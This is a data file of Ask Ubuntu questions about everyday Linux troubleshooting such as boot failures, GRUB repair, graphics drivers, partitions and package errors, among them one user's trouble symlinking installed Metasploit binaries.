430940	same files show different modified dates when accessed by different computers running ubuntu 12.04	i have several usb drives connected to my 3 computers , all of which run ubuntu 12.04 with unity . the usb drives are connected some to my primary system , some to the second , and some to the third , and are backed up daily . on those drives i have a number of files ( old photos ) supplied by a contributor to my web site . some of those files show a modified date that displays in nautilus as 1963 when i access them on my primary computer . i just discovered that when accessed on my second computer , the year displays in nautilus as 60418 or 60419 , and the month and day are different than when viewed on the primary computer . obviously , i 've always known that the dates associated with those files are incorrect , but how can the date display differently on two computers running the same os , maintained and updated to be as close to identical as possible ?
430946	problem after upgrade and update : one of my os and corresponding partition disappeared ! ? ? ! ! ! ! ? ? : (	my field work computer 's hd has 3 partitions : first : ubuntu 12.04 lst ( ~80 gb ) second : windows xp ( ~50 gb ) third : debian ( ~30 gb ) normally during booting process i can choose between the 3 os depending the needs after an upgrade and update using the typical ubuntu 's pops up window my booting menu changed and the 3rd os is not listed also when i am under ubuntu os the partition of the hd is not visible and obviously there is no possibility to mount it through file manager so , how can i set up the boot menu to have my usual dual-boot option or to restore the previous configuration before updating ? thanks for any suggestion on that matter gilles
430949	ati drivers ! ! help	i have a toshiba satellite a300-276 on which i installed ubuntu 12.04 but i can not install the graphics card driver , it is impossible already tried everything , when i thought i had managed to install and restarted the computer , an error message appeared to say that the pc would start in `` low graphics mod '' someone knows what to do ? ps . did some upgrades , i put a 60gb kingston ssd drive , 4gb ram , and a processor t7250 core2duo
430951	drivers broadcom 4306/3 for 12.04 on a non-pae	( i lack the requisite reputation to comment to the mostly excellent post on the subject below installing broadcom wireless drivers so i am forced to ask separately ) dell d505 laptop with bcm4306 ver.3 broadcom ; non-pae iso used for install of ubuntu 12.04 alongside of a win xp installation on a 2nd generation pentium m. i followed the post linked above fairly well and got wireless to show up but it kept fluttering and never connected . so i went back to the post . overnight software updates chose some linux header files for me . but still no real wireless connection . ( the wireless signal is pretty weak to start but it is enough for the xp installation to use ) . i do n't know enough to dismiss the non-pae as a factor . any help would be appreciated .
430956	how to resize the root partition using gparted	i 'm new to gparted . i have to resize a partition that contains root file system which is full . previously i had windows installed in my system . i use a 250gb hard drive and was divided into 3 drives namely c , d and e drive . after this i installed ubuntu 12.04 and used the existing ntfs file system , to install ubuntu . now , i need to resize the partition mounted on root file system as it is full . below is the link to screenshot of gparted - what should i do to increase the size the /dev/sda6 without any data loss in gparted
430957	failed to create symbolic link	hey guys i need help with im trying this in terminal sudo bash -c 'for msf in $ ( ls msf* ) ; do ln -s /opt/metasploit-framework/ $ msf /usr/local/bin/ $ msf ; done' and i get this ln : failed to create symbolic link `/usr/local/bin/msfbinscan ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfcli ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfconsole ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfd ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfelfscan ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfencode ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfmachscan ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfpayload ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfpescan ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfrop ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfrpc ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfrpcd ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfupdate ' : file exists ln : failed to create symbolic link `/usr/local/bin/msfvenom ' : file exists
430960	what gpu for dual 2560x1600 display is well supported ?	i built a custom pc and finding a well supported graphical card is a nightmare . i bought an xfx r7870 without doing much research . now i realise that even with the ati proprietary drivers there is a lot of bugs . i tested many kernel before finding one that would even boot with that card so now i have a `` working '' ubuntu 13.04 desktop but upgrading to 13.10 ( or installing 12.04 ) will break the video driver . building .deb drivers for 13.10 kernel does not work . with 13.04 the problem is that flash player is unstable and trying to watch a movie full screen with vlc or totem is not working at all . i came to the conclusion that i should find a better ubuntu compatible gpu . i have 2x 30 '' monitors with dual-dvi and displayport input . i 'm not a gamer but a developer ; however , i would like to be able to watch hd movies in fullscreen . what ubuntu supported video card should i buy ?
430966	wine : install mono for windows to run .net 2.0 applications	i just downloaded the gta sa.. and it works fine with the sa : mp 0.3z rc2 , but i have a big problem . there is a server which uses a secondary client . i tried to run it with wine and mono , but it still does n't work . by the way , it needs .net 2.0 on windows , but i ca n't make it work on ubuntu 12.04 . this is the client program : http : //data.hu/get/7493141/classrpg.exe error message when run by wine : wine : install mono for windows to run .net 2.0 applications . error message when run by mono : the entry point method could not be loaded . any ideas ?
430969	how can i usb install ubuntu 12.04.4 on my macbook using the 32-bit image ?	i 've downloaded both the 32 and 64-bit images of ubuntu 12.04.4 and used the startup disk creator in ubuntu to create a both a 32 and 64-bit ubuntu install usb . however , i am only able to boot from the 64-bit install usb . the 32-bit install usb wo n't even show when i try to show external devices on boot by holding alt . the screen is just white . i 've noticed , that the 64-bit install usb contains an efi folder that the other one is missing . so i tried to play around a bit by copying the grub and efi folders to the 32-bit install usb . now the 32-bit install usb would appear during boot . but when i select it , the kernel fails to load . can you please help me to make it possible to install 32-bit 12.04.4 ? i have only 2gb of ram ...
430971	unity panel icons not working	all the custom icon themes i install can change the nautilus icons just fine , but the unity panel always looks like this : except when i set it to the standard ubuntu mono , that looks normal . i 'm sure the themes i 've installed have these icons present , and that the problem is that they are for some reason unable to load them . how can i fix the problem ? i 'm using unity tweak tool to change them , and downloaded the themes from gnome-look.org if that matters .
430980	finding specific files and data inside files	i am pretty new to ubuntu i am trying to grasp concepts of finding specific files in directories and in another instance finding specific string or pattern of strings in files . i have read various articles and found command grep and find . am i on the right track if not please guide me ?
430987	copying files between ubuntu and windows partitions	are there any particular problems associated with transferring files between ubuntu and windows ( via nautilus ) or procedures that should be followed ? i use a windows partition for using a scanner , then drag the files over from a data partition ( or external hd ) as and when i need them . i know this is n't ideal but are there issues i should be aware of when doing this ?
430988	ubuntu 12.04 black screen after login with white mouse cursor	after i login to my ubuntu 12.04 i get an black screen with white mouse cursus only . before it was sometimes and then i only had the left beam and the desktop was black.booted my laptop with the live cd from ubuntu 12.04 and then choose for ¨try ubuntu without installing¨ then showed up an desktop , so its not mine hdd.right ? i tried so far : step1 : sudo apt-get install ppa-purge sudo ppa-purge ppa : unity-team/staging sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity where the two upper lines didn´t work step2 : sudo apt-get remove nvidia-* step3 : unity -- reset this was not good at all this was from the link : after logging in , there 's a black screen and my cursor , nothing else ! in ubuntu 12.10 and i tried when i get the blackscreen : ctrl+alt+f1 and then ¨startx¨ which gaves me an error this was from the link : black screen on login can please help anyone me ? edit : i login with ubuntu 2d and my desktop showed up . i am very happy now , maybe a bug ?
430991	whenever i use sudo apt-get remove/install , reply is error	i am using ubuntu 12.04lts and whenever i use sudo apt-get remove sudo apt-get install it replies cp : failed to extend `/boot/initrd.img-3.5.0-47-generic.dpkg-bak ' : no space left on device dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is this wright ? is it installing/removing ? the reply for sudo apt-get install -f is reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up initramfs-tools ( 0.99ubuntu13.4 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... ln : failed to create hard link /boot/initrd.img-3.5.0-47-generic.dpkg-bak ' = > /boot/initrd.img-3.5.0-47-generic ' : operation not permitted cp : writing /boot/initrd.img-3.5.0-47-generic.dpkg-bak ' : no space left on device cp : failed to extend/boot/initrd.img-3.5.0-47-generic.dpkg-bak ' : no space left on device dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 )
431007	how to work around keyboard layouts requiring alt key which are also keyboard shortcuts in libreoffice ?	in libreoffice writer , alt + e is the shortcut to activate the edit menu , alt + a for table menu and so on . i have a dell inspiron 3520 . the layout i normally use is english ( us ) . the one that i 'm looking to use is hindi ( bolnagri ) ; which requires me to use the alt key along with various letter keys regularly . it does n't work , because alt + many of these letters are shortcuts in libreoffice writer . i want to disable these shortcuts . how do i achieve it ? i am using ubuntu 12.04 in case it matters .
431009	how to run indicator-synapse in lubuntu	i 'm running lubuntu 13.10 and i have added the following repositories to install indicator-synapse ppa : elementary-os/daily ppa : elementary-os/unstable-upstream and successfully installed indicator-synapse using apt-get . however , i am unable to find or even run indicator-synapse from the command line and can not find it to add to the panel in lubuntu . i 've successfully installed synapse but not the indicator-synapse . can anybody assist ?
431011	can not restore grub after windows 8.1 upgrade	i have an ubuntu 13.10 and windows 8 dual-boot working properly , and upgrading to windows 8.1 breaks grub2 as expected . however , this time boot-repair was not able to bring grub back for me . my laptop jumps right into windows . i double checked that windows 8.1 re-enabled fast startup , so i 've disabled it . and in my bios , ueif is used for boot and secure-boot is disabled . i have a 500gb gpt partition , in which , sda1 is the efi partion , sda2 is the /boot , sda3 is the / for ubuntu , and sda7 is the swap area . for windows , sda4 is the msft reserve , sda5 is c : // , and sda6 is windows recovery . those are ( at least ) my original setup . here 's the boot info : http : //paste.ubuntu.com/7051548/ i also tried mount my hard drive from a live ubuntu session , then re-install grub on /dev/sda , which did n't work either . is there any other thing i could try to bring my ubuntu back ?
431015	error : unknown filesystem ; grub rescue	yesterday there was a power failure at my house and when i turn on my desktop , i had problems with user permissions on linux . i restarted linux and then , while booting , it gave me that error described on the title . i 've looked for some tutorials in order to fix this problem , but none of them could work . i 'll show you some prints about information that could be important to know : http : //prntscr.com/2yqxz9 http : //prntscr.com/2yqys6 i have some troubles about booting through usb or cd because my bios setup does n't have an option to boot via usb and i do n't have access to my boot manager now and my cd-rom driver is not working properly . at this moment , i only have access to bios setup and grub rescue . i prefer to fix this problem through line commands but if it 's not possible , i will try to recover my cd driver or boot manager , anyone knows how can i fix this ?
431019	ca n't install just keeps rebooting after intsalling new graphics card	i installed the nsv 280 as it was the only dual screen graphics card that would fit in my computer . i have a dell optiplex gx520 sff . after installing the card the computer just keeps rebooting . i tired then to reinstall ubuntu but the moment the purple screen comes up at the beginning it just reboots . i have no idea what to do : ( i 'm using ubuntu 12.04 btw , 32 bit .
431020	qnix nvidia display issue with 331 driver and 770	upon trying to get my ubuntu 13.10 installation working on my new computer , i encountered an issue with the proprietary nvidia drivers and my display . apparently , the two do n't agree with each other ( has to do with garbage edid returned by the monitor ) . i was very excited when i found the following blog post , which exactly described the problem i have been having and how to fix it : http : //blog.patshead.com/2013/09/linux-and-the-qnix-qx2710-monitor.html i followed his directions exactly on how to configure my xorg.conf file , and the screen shows up . however , the right side of the screen is very dark and flickers -- it seems as though the values are quite correct . i have been struggling on how to proceed fixing this problem . it seem i need something different for the following line in my xorg.conf : modeline `` 2560x1440 '' 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync any assistance i could get i would be very grateful for . here 's a pastebin of my current xorg.conf for reference : http : //pastebin.com/7amsdcay
431021	how to edit files in /usr/bin ?	correct me if i 'm wrong , but one of the directories in which commands are stored in ubuntu is /usr/bin . i tried viewing one of the elf 64-bit lsb executable files ( synergy ) with nano but all i see is a mix of random symbols/letters . can i view these files ? if so , how do i go about it ?
431022	installing without overwriting hdd	i have an external hard drive , with a few partitions on it . because i have a bootable version of ubuntu 12.04 on it , i have all of the standard linux partitions on it , as well as one called data ( which contains other data that i want preserved ) . today , i upgraded to ubuntu 12.10 , which seemed to have messed up my installation . whenever i tried to boot ubuntu , i got a black screen with a simple insertion cursor on the top left corner . after some searches , i found that this was an error with the gui-portion of ubuntu . using the terminal , i reinstalled ubuntu-desktop and unity , but i still am unable to access the desktop . i had planned to install 13.10 after 12.10 finished upgrading , so i decided to just get rid of my previous installation , and replace it with 13.10 . i have a liveusb with ( bootable ) ubuntu 13.10 on it , so i want to install that onto my hard drive . however , i do n't want to lose my data partition . is this possible , and if so , how ? i 'm going to boot 13.10 off of my hard drive ( once i install it on there ) , but i also have windows 8.1 installed on my laptop . thanks ! edit : on the installer , one of the options is `` upgrade ubuntu 12.10 to ubuntu 13.10 '' . will that preserve my data and my windows installation ?
431025	xubuntu brightness not working	i am trying to gain the ability to change the brightness on my toshiba satellite laptop running xubuntu . i have xbacklight , and am running xfce4-power-manager with the -- no-daemon flag . it 's not working . essentially , i see the popup brightness meter , but the brightness itself remains unchanged . even more strangely enough , using the fn keys and the popup brightness meter actually changes the value of xbacklight -get ! so something internal is being changed , but the brightness is n't actually physically changing . what could be the problem ? additionally , echo 1 | sudo tee /sys/class/backlight/acpi_video0/brightness does not change it either , even though it echos back the correct value .
431028	how do i set up a tor server ?	i would like to host a tor hidden services website ( aka .onion site ) on my ubuntu desktop with the lamp stack installed . while the tor docs offer some guidance on running an anonymous server , the directions are pretty vague . it 's the second paragraph of `` step one : install a web server locally '' i 'm unclear about . so , bind my web server to localhost . check , i did that by editing the apache2 config file to only listen on 127.0.0.1:80 . i also made sure mysql was also bound to 127.0.0.1 too . what else should i do ? what error messages should i edit ? is there anything in my php installation i should edit ? i 'll also be running wordpress . anything to be concerned with there ? finally i have installed nikto to scan for vulnerabilities . are there any tests or parameters i should include given this is a tor hidden service ?
431030	configuring grub-pc : grub failed to install to the following devices	i was running windows 7 when i decided to delete some partitions belonging to an installation of fedora . when i shut down windows and returned to it , i found this error message : error : no such partition grub rescue desperately , i booted up my bootable flash drive version of ubuntu 12.04 and searched google for an answer which led me to this : http : //itsfoss.com/solve-error-partition-grub-rescue-ubuntu-linux/ i followed the tutorial up to the point where i came to reinstalling grub and got this zinger : ┌───────────────────────────────┤ configuring grub-pc ├────────────────────────────────┐ │ │ │ grub failed to install to the following devices : │ │ │ │ /dev/sda │ │ │ │ do you want to continue anyway ? if you do , your computer may not start up properly . │ │ │ │ writing grub to boot device failed - continue ? │ │ │ │ < yes > < no > │ │ │ └──────────────────────────────────────────────────────────────────────────────────────┘ i am unsure as to whether i should proceed or what options i should take .
431034	system fails to boot after running update manager in 12.04	i did a clean install of 12.04.3 but once i run the update manager the system hangs at the ubuntu ... .. screen after rebooting . i have tried re-installing , updating to correct video drivers , etc . and the system works fine . it is only after i run update manager that the system fails to reboot . what is strange is that i was not having this problem a few months ago . i do not know how to troubleshoot this issue , any advice would be wonderful ! regards .
431037	nfs will mount but is not accessible until browsed through gui	i 'm using windows 7 x64 as my normal os , and using ubuntu under virtualbox . i have hanewin installed as nfs server , and i put the following under ubuntu 's /etc/fstab : 192.168.1.2 : /websites /home/user/ror nfs rsize=8192 , wsize=8192 , timeo=14 , intr , udp , nolock , rw , user the mount shows up as a folder in the task bar on bootup . however if i were to go straight into the console and type cd ~/ror , i get a no such file or directory error . so then i have to literally click on the folder icon on the task bar which opens the mount just fine . then i go back into the console and type the same thing ... it works . i can also type mount -a in the console and then it works . why wo n't it do this automatically ?
431039	what modules do i need to run perl cgi with apache ?	i have some cgi script using perl and i would like to make them work on apache . i have the following installed : $ dpkg -l | grep perl | grep apach ii libapache-session-perl 1.90-1 all modules for keeping persistent user data across http requests ii libapache2-authcookie-perl 3.19-3 all perl authentication and authorization via cookies ii libapache2-mod-perl2 2.0.8+httpd24-r1449661-6ubuntu1 i386 integration of perl with the apache2 web server ii libapache2-mod-perl2-dev 2.0.8+httpd24-r1449661-6ubuntu1 all integration of perl with the apache2 web server - development files ii libapache2-mod-perl2-doc 2.0.8+httpd24-r1449661-6ubuntu1 all integration of perl with the apache2 web server - documentation ii libapache2-reload-perl 0.12-2 all module for reloading perl modules when changed on disk ii libapache2-request-perl 2.13-2.1 i386 generic apache request library - perl modules ii libapache2-sitecontrol-perl 1.05-1 all perl web site authentication/authorization system and in /etc/apache2/apache2.conf i have added something like this : scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory /usr/lib/cgi-bin/ > options indexes followsymlinks options +execcgi # allowoverride none require all granted addhandler cgi-script cgi pl < /directory > after that i get the script contents in the browser instead of getting it executed . the mentioned script has the following permissions : -rwxr-xr-x 1 root root 30146 mar 7 19:17 /usr/lib/cgi-bin/status.pl if i put the following link $ ll /etc/apache2/mods-enabled/cgi.load lrwxrwxrwx 1 root root 26 mar 7 21:40 /etc/apache2/mods-enabled/cgi.load - > ../mods-available/cgi.load then i get error server 500 .
431040	12.04 lts - recent update : fails to boot with version 3.8.0-37 generic	i 'm not sure what happened but last night when the new updates were released and software center prompt me i installed and rebooted as normal . everything on my system worked fine until the updates were installed and i rebooted . when i try to boot i am greeted with code flying down the screen and the message : `` fixing recursive fault but reboot is needed '' . then a trace is ran until my system locks up . the current linux version is 3.8.0-37 generic . edit i am able to boot by switching to a earlier version , but it seems like a ton of people are having this issue . i am able to boot with linux version 3.8.0-36-generic but am still having issues booting into 3.8.0-37 .
431041	how to work with .bin files	i want to install jdk 1.6 on my lubuntu os . but it is some specific .bin file instead of tar.gs for linux - java se development kit 6u45 . update : after following suggestion , i catch next : error : failed dependencies : /bin/basename is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/cat is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/cp is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/gawk is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/grep is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/ln is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/ls is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/mkdir is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/mv is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/pwd is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/rm is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/sed is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/sort is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/touch is needed by jdk-2000:1.6.0_45-fcs.x86_64 /usr/bin/cut is needed by jdk-2000:1.6.0_45-fcs.x86_64 /usr/bin/dirname is needed by jdk-2000:1.6.0_45-fcs.x86_64 /usr/bin/expr is needed by jdk-2000:1.6.0_45-fcs.x86_64 /usr/bin/find is needed by jdk-2000:1.6.0_45-fcs.x86_64 /usr/bin/tail is needed by jdk-2000:1.6.0_45-fcs.x86_64 /usr/bin/tr is needed by jdk-2000:1.6.0_45-fcs.x86_64 /usr/bin/wc is needed by jdk-2000:1.6.0_45-fcs.x86_64 /bin/sh is needed by jdk-2000:1.6.0_45-fcs.x86_64 rpm : rpm should not be used directly install rpm packages , use alien instead ! rpm : however assuming you know what you are doing ... error : failed dependencies : /bin/sh is needed by sun-javadb-core-10.6.2-1.1.i386 how can i unpack and use this .bin file to unpack jdk ?
431049	play on linux wine menu builder not found	can anyone help with this ? after running tsot with play on linux , the following is shown in debug mode . [ pol_wine ] message : running wine-south park : the stick of truth.exe wine : can not find l '' c : \\windows\\system32\\winemenubuilder.exe '' err : wineboot : processrunkeys error running cmd l '' c : \\windows\\system32\\winemenubuilder.exe -a -r '' ( 2 ) p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory [ pol_wine ] message : wine return : 53
431054	what is the minimum number of nodes required for maas ?	we have an ubuntu vm with a maas controller and only 1 node . we are not able to install juju . is there a minimum node requirement for maas ?
431055	use udevadm to test for printer offline ?	i want to test that a printer on a parallel port is available , that sending a file to it will not fail because it is offline , off , cover open , out of paper . my reading of the udevadm manpage suggests that it might be used for this but it is n't clear how , or maybe my reading is too hopeful . is this the right approach ; is there a better way ? ubuntu : 12.04.4 the printer is on /dev/lp0 , can be written to , and is defined for udev : $ udevadm info -- name=/dev/lp0 -- query=all p : /devices/pnp0/00:07/printer/lp0 n : lp0 e : devname=/dev/lp0 e : devpath=/devices/pnp0/00:07/printer/lp0 e : major=6 e : minor=0 e : subsystem=printer e : tags= : udev-configure-printer : e : udev_log=3 e : usec_initialized=8006083 and : $ udevadm info -a -n /dev/lp0 looking at device '/devices/pnp0/00:07/printer/lp0 ' : kernel== '' lp0 '' subsystem== '' printer '' driver== '' '' looking at parent device '/devices/pnp0/00:07 ' : kernels== '' 00:07 '' subsystems== '' pnp '' drivers== '' parport_pc '' attrs { id } == '' pnp0400 '' looking at parent device '/devices/pnp0 ' : kernels== '' pnp0 '' subsystems== '' '' drivers== '' ''
431058	using a cronjob to clean /tmp	is it save to use bash script and a cronjob to remove all files in /tmp ? or should i do this differently for other reasons , maybe ?
431062	how do i fix my broken packages for 13.10	i really need to install some updates onto my computer but every time it says : the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f so i went into terminal and ran the command and it did absolutely nothing . i then tried sudo apt-get update and it also did absolutely nothing .
431063	can not change window border of gnome classic session	i have found many `` solutions '' for this problem , including modifying gsettings.py , as well as installing gnome tweak tool or unity tweak tool . i have even attempted using gnome 3.10 . nothing i have tried has worked . the issue that i am experiencing is that , within gnome classic , i am unable to change the window borders . most gtk3 themes installed in ~/.themes/ work in the sense that i am able to change the gtk theme , but not the window borders ( border , title bar , close/maximize/minimize buttons ) i was finally able to get window borders using the correct theme while using gnome fallback , however , gnome fallback does not seem to be an ideal solution for me ( introduces many more issues , such as keyboard settings not having an affect on my session ) . does anybody have any suggestions on how to get a gnome classic session honoring both gtk and window borders of a theme ?
431069	where to find compiz profiles online to load into my ubuntu ?	i am a very newbie using compizconfig setting manager and usually any edit i make with it does n't bring good effects . so i wonder , is there a repository so i can find ccsm config files so i can import on my ubuntu ?
431075	camera monitor keeps triggering	just installed firefox into wine and now webcam-monitor keeps saying something is accessing my webcam . what 's going on ?
431076	ubuntu touch on x86 tablets	i would like to ask whether is it possible to run ubuntu touch ( not desktop version of ubuntu ) on x86-based tablets ( i am using iconia w510 with intel atom ) . the pre-installed os is windows . i want to use touch version and not classic ubuntu . can anybody help ?
431080	fixing var errors	sorry for not being able to properly format my question because i 'm using se android app , my xubuntu is n't working . i dont know what exactly is the error but i 'll try to describe what happened and hopefully you can help me further debug and solve the problem , im on xubuntu 13.10 64 bit . 2 days ago , while trying to make php work , i chmod -r /var that worked but sudo apt-get install x says that var/lib should have chmod 0700 or something like that so i did chmod 0700 /var/lib and chmod -r 0700 /var/lib . i do n't remember the exact permission but i messed /var permissions that 's for sure . anyway i dont know whether that 's a big deal or not . i also messed something else up , apt-get install tasksel , i did n't wait for it to finish installing , i remembered that i could install lamp without tasksel , so i abandoned installation ctrl-z . right after ctrl-z , i got that red icon next to the clock saying that this error usually occurs when a package does n't finish installing dependencies . i tried updating the packages did n't work . apt-get no longer works , i can not install nor remove anything var is locked or something . it 's the same error you get when you try to install something from terminal while synaptic package manager is opened . i tried restarting the pc thinking that some background process is running , now xubuntu does n't work , it boots and everything i see the xubuntu blue screen loading but i dont see the login screen afterwards , just a black screen ( not a tty ) . i tried reinstalling , but there 's no ( reinstall option ) in the live cd , so i 'd have to format the hard drive , i dont want to do that . i have so many stuff . if i go to tty and fix the mess i made in var , would it fix it ? if so then what are the different permissions for folders and files in var ?
431081	how do i configure the left click to select only partial words/sentences ?	i am using ubuntu 12.04 and whenever i am in any window that has text - such as firefox or netbeans and i try to select partial words/sentences - it deselects them immediately . it only allows me to select whole words - which is causing me a lot of problems if i only want to select and copy code parts ( nearly impossible ) is there a way to change the selection behaviour ? make it act more like windows ? thanks
431085	ubuntu 13.10 falls asleep a second time after i plug in charger and put in password	after ubuntu goes to sleep because of lack of battery , after ubuntu goes to sleep because of lack of battery , i plug in the charger and it powers on . i put in the password . it begins the process of unlocking and then it falls asleep again making me put in the password again and to wait for it to unlock to the desktop . this is inconvenient .
431086	initialize start-up applications in certain workspaces ?	is it possible to set start-up applications to initialize in certain workspaces ? i 'd like to not have to manually distribute my start-up applications across my numerous workspaces every time i boot up my machine . i 'm running ubuntu 12.04 . any help ?
431089	ubuntu 13.10 blackout after nvidia-cuda-toolkit installation	i do not have a gpu , but still i experimentally installed nvidia-cuda-toolkit through the terminal like sudo apt-get install nvidia-cuda-toolkit . nvcc command was working fine with sequential program after that . but ever since i restarted my laptop , i get the black screen . i tried to uninstall it like sudo apt-get remove nvidia-cuda-toolkit i then tried to purge the configuration since it did not work too . sudo apt-get remove nvidia-cuda-toolkit finally i install aptitude and removed all the dependencies like aptitude purge nvidia-cuda-toolkit how would i fix this issue ? ps : i have a windows 7 which is a dual os and it is working fine .
431091	after upgrade system always boot to low-graphics mode	i tried everything like : reinstall ubuntu-desktop reinstall xserver-xorg reinstall nvidia drivers install gdm and stop lightdm im using ubuntu 13.10 . can anyone help me ? i dont want to reinstall ubuntu , because i configured a lot of tools .
431095	how to install on a mac and get rid of osx	i would like to install ubuntu on a mac instead of running osx . how can i do this ?
431099	dual monitors black border	i followed a guide to set up a hp pavilion dv6000 laptop with a samsung syncmaster 712n monitor via vga as dual monitors side by side . both resolutions are set to 1024 x 768 ( ratio 4:3 ) , but the laptop 's screen has a black border on the sides . i would like to have the image on the whole screen . the laptop 's native resolution is 1280x800 ( ratio 16:10 ) and the external 's monitor native resolution is 1280x1024 ( ratio 4:3 ) . lspci | grep vga says : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 )
431101	i ca n't use my wifi connection in a live environment after restarting	i am using live mode of ubuntu 12.04 . every time i activate the additional drivers and restart the system , the wireless connection is still grayed in the options , and the driver is still deactivated .
431105	remove config files of any package	how would i remove the config files of any package , or do apt-get purge and re-install it without removing any of its dependencies ? thanks !
431106	3d game engines in ubuntu	i know this must be one of the many question around the same topic . but , i want clear mind and new eyes in this . i am beginning to grasp java for game development for pc and tablet ; i cant use unity 3d to i ask for help in choosing a game engine for ubuntu using java as is primary language . i look around and there a lot i just want to narrow it down a bit . thanks in advance and hope for your advice : )
431110	i have no internet connection with my first install of ubuntu 12.04	when i installed ubuntu 12.04 on my net-book , i did n't have an internet connection , as to the fact that i had removed windows xp , and had no way to open the connection . my install of ubuntu 12.04 does n't have any connection to the web to get updates , etc . i would like to get help with this problem . please note that this is my first install of this os .
431117	partition and preserve data	i use ubuntu 12.04 and have an external hd of 4 tera formated in fat . there is a lot of data in this hd , much more than the note and take . i would like to create ntfs partitions in the external hd preserving all data stored there . does anyone know if/how that is possible ? i 'm new at linux ... many thanks
431119	how can i access nvidia control panel	i just got ubuntu two weeks ago . i installed the game minecraft using openjdk 7 runtime . it 's laggy ( it was on windows too ) until i did one thing . on windows i would right click my desktop and click nvidia control panel and then i would change the 3d graphics or something like that to performance . can you tell me how to access nvidia control panel on ubuntu ? thanks . i am running ubuntu 13.10 64-bit
431128	capture groups are ignored when renaming files	i have a number of files in this format : # # . # # - file name.mp4 i want to rename them to : s # # e # # .mp4 this is what i came up with : rename -n `` s/^ ( \d { 2 } ) \. ( \d { 2 } ) . */s $ 1e $ 2.mp4/ '' it works when i tested it on http : //regexr.com/ but when i run the command on my ubuntu 12.04 installation all my files get renamed to se.mp4 so it looks like the groups are being ignored or not inserted or something along those lines . am i missing something blindingly obvious or is something else going on ? i ended up using pyrenamer and that worked wonderfully , but i would still like to know why rename is n't working properly . cheers and thanks for any help you can give me .
431129	update manager shows firefox when already installed	i 'm very very new to the linux and ubuntu world . the update manager is showing three important ( security ) updates : safe and easy web browser from mozilla english language pack for firefox spanish language pack for firefox i have firefox already installed , it came with my ubuntu installation , and in spanish ! what i 'm supposed to do ? there 's a similar question here ( 2011 ) which says that it 's a bug , but we 're in 2014 and i 'm still having this issue .
431130	problems with ubuntu 12.04 lts on 2006 imac	late 2006 imac . excited to switch to linux , now extremely frustrated . my screen looks strange at boot up , lots of flashing dots . ubuntu loads without most desktop icons visible . ubuntu freezes and apps crash . ati radeon graphics , could that be the problem ? i am currently reinstalling to see if that somehow helps . i am dual-booting os x
431134	my screen has pulsing blurriness after attempting ui scale	did an upgrade from 13.10 to 14.04 . everything was going fine until i did a ui scale . now there 's a pulsing blurriness on my screen . any way i can reset that ? i 've uninstalled/reinstalled xorg drivers and propietry drivers for my nvidia 660 , and tried sliding the ui slider around with no effect .
431136	ubuntu 12.04 installer does n't detect partitions	it 's the first time i am trying to install ubuntu , and it 's ubuntu 12.04 . the thing is that i have got two partitions ( c and d ) . d is empty , while in c i have got all the files . i defragmented both and also formatted d , which has capacity for 190 gb . the problem comes when i try to install ubuntu , because the installer does n't detect my main os ( win 7 ) . so i continue with the `` something else '' option , but it does n't detect neither c nor d : so instead of installing ubuntu , i just try it , and when i open the media folder , the partitions are there : os folder is c , while data folder is d. i do n't want to make partitions again if there 's other option , and i want to keep win 7 also . thanks .
431138	can not find install windows 7 alongside	i tried installing ubuntu 13.10 from a usb disk , but it does n't find my windows 7 . it says it has no other operating systems . i am having samsung np550p5c - s05in . i tried many methods of your forum , but i could n't find anything helping me . i am eagerly waiting to use ubuntu but this thing gets a lot out of me . please help me to install ubuntu 13.10 alongside windows 7
